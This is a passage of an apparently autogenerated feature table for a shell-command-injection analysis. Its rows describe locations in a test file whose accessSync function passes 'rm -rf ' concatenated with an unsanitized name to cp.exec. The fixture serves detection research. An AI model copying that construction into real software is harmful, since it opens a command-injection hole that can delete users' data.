Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:8 | cp.exec | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:5:228:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:5:228:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:5:228:8 | exec | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:5:228:8 | exec | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:5:228:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:10:228:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:22:228:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:6 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:6 | path | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:6 | path | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:6 | path | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:6 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:17 | path.accessSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:17 | path.accessSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:17 | path.accessSync | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:17 | path.accessSync | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:17 | path.accessSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | exceptional return of path.ac ... c(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | exceptional return of path.ac ... c(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | exceptional return of path.ac ... c(name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | exceptional return of path.ac ... c(name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | exceptional return of path.ac ... c(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:8:231:17 | accessSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:8:231:17 | accessSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:8:231:17 | accessSync | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:8:231:17 | accessSync | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:8:231:17 | accessSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | CalleeFlexibleAccessPath | path.accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:19:231:22 | name | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:232:11:232:11 | e | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:232:11:232:11 | e | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:232:11:232:11 | e | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:232:11:232:11 | e | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:232:11:232:11 | e | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 